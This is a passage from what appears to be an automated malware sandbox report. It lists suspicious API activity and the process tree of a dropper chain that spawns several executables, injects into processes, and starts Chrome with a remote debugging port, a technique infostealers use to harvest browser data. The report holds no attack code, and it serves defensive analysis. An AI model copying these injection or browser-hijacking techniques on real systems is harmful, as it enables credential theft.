N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2808 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe
PID 2808 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe
PID 2808 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe
PID 4632 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 4632 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 4632 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2808 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe
PID 2808 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe
PID 2808 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe
PID 3116 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 3116 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 3116 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 3996 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 3996 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 3996 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 3996 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 3996 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 3996 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 3996 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 3996 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 3996 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 3996 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 3996 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 3996 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 3116 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe
PID 3116 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe
PID 3116 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe
PID 3116 wrote to memory of 4448 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
PID 3116 wrote to memory of 4448 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
PID 3116 wrote to memory of 4448 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
PID 4448 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe C:\Windows\TEMP\{CF76D235-72E8-4901-A72C-4281AFB358A0}\.cr\z3SJkC5.exe
PID 4448 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe C:\Windows\TEMP\{CF76D235-72E8-4901-A72C-4281AFB358A0}\.cr\z3SJkC5.exe
PID 4448 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe C:\Windows\TEMP\{CF76D235-72E8-4901-A72C-4281AFB358A0}\.cr\z3SJkC5.exe
PID 1700 wrote to memory of 2820 N/A C:\Windows\TEMP\{CF76D235-72E8-4901-A72C-4281AFB358A0}\.cr\z3SJkC5.exe C:\Windows\TEMP\{6340C324-E96D-4236-A330-87A672404F0F}\.ba\WiseTurbo.exe
PID 1700 wrote to memory of 2820 N/A C:\Windows\TEMP\{CF76D235-72E8-4901-A72C-4281AFB358A0}\.cr\z3SJkC5.exe C:\Windows\TEMP\{6340C324-E96D-4236-A330-87A672404F0F}\.ba\WiseTurbo.exe
PID 1700 wrote to memory of 2820 N/A C:\Windows\TEMP\{CF76D235-72E8-4901-A72C-4281AFB358A0}\.cr\z3SJkC5.exe C:\Windows\TEMP\{6340C324-E96D-4236-A330-87A672404F0F}\.ba\WiseTurbo.exe
PID 2820 wrote to memory of 2192 N/A C:\Windows\TEMP\{6340C324-E96D-4236-A330-87A672404F0F}\.ba\WiseTurbo.exe C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe
PID 2820 wrote to memory of 2192 N/A C:\Windows\TEMP\{6340C324-E96D-4236-A330-87A672404F0F}\.ba\WiseTurbo.exe C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe
PID 2820 wrote to memory of 2192 N/A C:\Windows\TEMP\{6340C324-E96D-4236-A330-87A672404F0F}\.ba\WiseTurbo.exe C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe
PID 2192 wrote to memory of 316 N/A C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe C:\Windows\SysWOW64\cmd.exe
PID 2192 wrote to memory of 316 N/A C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe C:\Windows\SysWOW64\cmd.exe
PID 2192 wrote to memory of 316 N/A C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe C:\Windows\SysWOW64\cmd.exe
PID 3116 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe
PID 3116 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe
PID 3116 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe
PID 2192 wrote to memory of 316 N/A C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe C:\Windows\SysWOW64\cmd.exe
PID 3116 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe
PID 3116 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe
PID 3116 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe
PID 3116 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10077160101\bPDDW9F.exe
PID 3116 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10077160101\bPDDW9F.exe
PID 1196 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1196 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4544 wrote to memory of 1128 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4544 wrote to memory of 1128 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4544 wrote to memory of 3380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4544 wrote to memory of 3380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4544 wrote to memory of 3380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4544 wrote to memory of 3380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4544 wrote to memory of 3380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4544 wrote to memory of 3380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4544 wrote to memory of 3380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4544 wrote to memory of 3380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4544 wrote to memory of 3380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe

"C:\Users\Admin\AppData\Local\Temp\56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe

C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3996 -ip 3996

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 948

C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe

"C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe"

C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe

"C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe"

C:\Windows\TEMP\{CF76D235-72E8-4901-A72C-4281AFB358A0}\.cr\z3SJkC5.exe

"C:\Windows\TEMP\{CF76D235-72E8-4901-A72C-4281AFB358A0}\.cr\z3SJkC5.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe" -burn.filehandle.attached=764 -burn.filehandle.self=808

C:\Windows\TEMP\{6340C324-E96D-4236-A330-87A672404F0F}\.ba\WiseTurbo.exe

C:\Windows\TEMP\{6340C324-E96D-4236-A330-87A672404F0F}\.ba\WiseTurbo.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1700 -ip 1700

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1700 -s 860

C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe

C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1700 -ip 1700

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1700 -s 756

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe

"C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe"

C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe

"C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe"

C:\Users\Admin\AppData\Local\Temp\10077160101\bPDDW9F.exe

"C:\Users\Admin\AppData\Local\Temp\10077160101\bPDDW9F.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff85288cc40,0x7ff85288cc4c,0x7ff85288cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1968,i,7148252125621235404,3555082334418967925,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1964 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2108,i,7148252125621235404,3555082334418967925,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2128 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2316,i,7148252125621235404,3555082334418967925,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2272 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3216,i,7148252125621235404,3555082334418967925,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3232 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3272,i,7148252125621235404,3555082334418967925,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3256 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3924,i,7148252125621235404,3555082334418967925,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4552 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3928,i,7148252125621235404,3555082334418967925,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4732 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3892,i,7148252125621235404,3555082334418967925,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4528 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4556,i,7148252125621235404,3555082334418967925,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4492 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5076,i,7148252125621235404,3555082334418967925,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4736 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

